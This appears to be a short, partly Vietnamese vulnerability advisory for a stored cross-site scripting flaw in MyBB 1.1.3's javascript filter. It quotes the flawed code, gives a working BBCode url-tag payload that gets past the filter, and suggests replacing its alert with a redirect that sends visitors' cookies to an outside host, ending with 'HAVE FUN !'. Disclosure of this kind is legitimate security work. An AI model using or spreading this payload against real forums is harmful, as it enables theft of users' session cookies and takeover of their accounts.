Software: MyBB
Sowtware’s Web Site: http://www.mybboard.com
Versions: 1.1.3
Class: Remote
Status: Patched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level:low-medium
========================
{inc/functions_post.php}near 138
function fixjavascript($message)
{
$message = preg_replace(”#javascript:#i”, “java script:”, $message);
/* …….. */
{alos near 19}
$message = preg_replace(”#&(?!\#[0-9]+#si”, “&”, $message); // fix & but allow unicode
=========================
Khai thác :
Post bài viết với nội dung :
Code:
[url]javascript:alert(’Are you chicken ?’);//://ddd[/url]
Nếu như thay cái alert kia thằng cái 'window.localtion=http://domain.com/ghi.php?mybb='+document.cookie <== Vãi tội.
nguyên bản : http://myimei.com/security/2006-06-22/mybb-114-function_postphpxss-attack-in-url-tag.html
HAVE FUN !